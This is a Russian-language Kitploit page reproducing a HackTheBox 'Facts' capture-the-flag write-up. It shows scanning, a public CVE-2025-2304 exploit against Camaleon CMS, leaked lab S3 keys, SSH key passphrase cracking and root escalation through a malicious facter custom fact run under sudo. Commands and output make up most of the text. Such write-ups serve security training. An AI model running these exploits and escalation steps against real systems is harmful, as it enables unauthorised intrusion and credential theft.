Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
HTB-Facts-Writeup — HackTheBox Facts — разбор машины: CVE-2025-2304, перечисление MinIO S3, взлом ключей SSH и повышение привилегий с помощью facter. | Kitploit
Инструменты/GitHubGitHub/karimelsheikh1/htb-facts-writeup
Взлом паролейПовышение привилегийРазведкаАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийCTFТестирование на ПроникновениеБезопасность облачных сред

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Обучение и Образование
GitHubkarimelsheikh1/htb-facts-writeup

HTB-Facts-Writeup

HackTheBox Facts — разбор машины: CVE-2025-2304, перечисление MinIO S3, взлом ключей SSH и повышение привилегий с помощью facter.

Репозиторий
3 месяцев назадЕщё не проверено

HackTheBox — Разбор машины Facts

HackTheBox Difficulty OS

Информация о машине

ПолеДетали
ИмяFacts
ОСLinux
СложностьEasy
РелизSeason 10
СнятаNo

Обзор цепочки атак

root@kitploit:~
Recon → Web Enumeration → CVE-2025-2304 (Mass Assignment) → S3/MinIO Credential Leak → SSH Key Extraction → Passphrase Cracking → User Shell → facter Sudo Abuse → Root

Используемые инструменты


Разведка

Сканирование портов

root@kitploit:~
sudo nmap -p- --min-rate 5000 -T4 <TARGET_IP> -oN ports.nmap
sudo nmap -sV -sC -p 22,80,54321 <TARGET_IP>

Результаты:

root@kitploit:~
22/tcp    open  ssh     OpenSSH 9.9p1 Ubuntu
80/tcp    open  http    nginx 1.26.3 (Camaleon CMS)
54321/tcp open  http    MinIO S3 Server
root@kitploit:~
echo "<TARGET_IP> facts.htb" | sudo tee -a /etc/hosts

Перебор веб-ресурсов

root@kitploit:~
feroxbuster -u http://facts.htb -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -t 40
curl -s http://facts.htb/robots.txt
curl -s http://facts.htb/sitemap.xml

Ключевые находки:

  • Обнаружена CMS: Camaleon CMS 2.9.0
  • Панель администратора: http://facts.htb/admin/login
  • Страница регистрации: http://facts.htb/admin/register

Первоначальный доступ

Шаг 1 — Зарегистрировать аккаунт

Перейдите на http://facts.htb/admin/register и создайте аккаунт. Обратите внимание на капчу — регистрируйтесь через браузер.

Шаг 2 — CVE-2025-2304 (Массовое присвоение — повышение привилегий)

Конечная точка updated_ajax использует permit!, что позволяет обновлять все параметры, включая role.

root@kitploit:~
git clone https://github.com/Alien0ne/CVE-2025-2304
cd CVE-2025-2304
python3 exploit.py -u http://facts.htb -U <username> -P <password> -e

Вывод:

root@kitploit:~
[+] Login confirmed
    Current User Role: client
[+] Updated User Role: admin
[+] Extracting S3 Credentials
    s3 access key: AKIAA5CA83CCFE35CD69
    s3 secret key: zOCRxURBa6wha6rksxj6kCmwvdAQNYX6NPw2o2+n
    s3 endpoint:   http://localhost:54321

Облачное перечисление — MinIO S3

Порт 54321 запускает сервер, совместимый с MinIO S3. Используя утекшие учетные данные:

root@kitploit:~
import boto3
from botocore.client import Config

s3 = boto3.client(
    's3',
    endpoint_url='http://facts.htb:54321',
    aws_access_key_id='AKIAA5CA83CCFE35CD69',
    aws_secret_access_key='zOCRxURBa6wha6rksxj6kCmwvdAQNYX6NPw2o2+n',
    config=Config(signature_version='s3v4'),
    region_name='us-east-1'
)

paginator = s3.get_paginator('list_objects_v2')
for page in paginator.paginate(Bucket='internal'):
    for o in page.get('Contents', []):
        if 'info-etags' not in o['Key']:
            print(o['Key'])
            s3.download_file('internal', o['Key'], '/tmp/' + o['Key'].replace('/', '_'))

Найденные ключевые файлы:

root@kitploit:~
.ssh/authorized_keys
.ssh/id_ed25519        ← SSH private key
.profile
.bashrc

Взлом SSH-ключа

root@kitploit:~
chmod 600 /tmp/.ssh_id_ed25519
ssh2john /tmp/.ssh_id_ed25519 > ssh.hash
john ssh.hash --wordlist=/usr/share/wordlists/rockyou.txt

Взломанная парольная фраза: dragonballz


Пользовательская оболочка

root@kitploit:~
ssh -i /tmp/.ssh_id_ed25519 [email protected]
# Enter passphrase: dragonballz
root@kitploit:~
cat /home/william/user.txt

Повышение привилегий

Перечисление

root@kitploit:~
sudo -l
root@kitploit:~
(ALL) NOPASSWD: /usr/bin/facter

Эксплуатация — facter custom fact (выполнение Ruby-кода)

Facter загружает custom facts как Ruby-скрипты. Поскольку мы можем запускать его от root без пароля, мы внедряем произвольный Ruby-код:

root@kitploit:~
mkdir -p /tmp/facts
cat > /tmp/facts/pwn.rb << 'EOF'
Facter.add(:pwn) do
  setcode do
    exec("/bin/bash -p")
  end
end
EOF

sudo facter --custom-dir=/tmp/facts pwn

Получена root-оболочка!

root@kitploit:~
whoami   # root
cat /root/root.txt

Основные выводы

  • Уязвимости массового присвоения позволяют повышать привилегии, если входные данные не фильтруются должным образом.
  • Неправильно настроенные корзины S3/MinIO могут раскрывать конфиденциальные файлы, включая приватные SSH-ключи.
  • Слабые парольные фразы SSH-ключей могут быть взломаны с помощью распространённых словарей, таких как rockyou.
  • Бинарные файлы sudo с NOPASSWD всегда должны проверяться на возможность злоупотребления.
  • Цепочка мелких неверных настроек может привести к полной компрометации системы.

Ссылки

  • CVE-2025-2304 — Массовое присвоение в Camaleon CMS
  • GTFOBins — facter
  • HackTheBox

Данный разбор предназначен только для образовательных целей. Всегда проводите тестирование безопасности только на системах, которые вам принадлежат или на которые у вас есть явное разрешение.

Скачать инструмент
ИнструментНазначение
NmapСканирование портов и обнаружение служб
FeroxbusterПеребор веб-каталогов
CVE-2025-2304 PoCПовышение привилегий в Camaleon CMS
boto3 (Python)Перечисление MinIO/S3 и загрузка файлов
ssh2johnПреобразование SSH-ключа в хэш для взлома
John the RipperВзлом парольной фразы SSH-ключа
facterПовышение привилегий через неправильную настройку sudo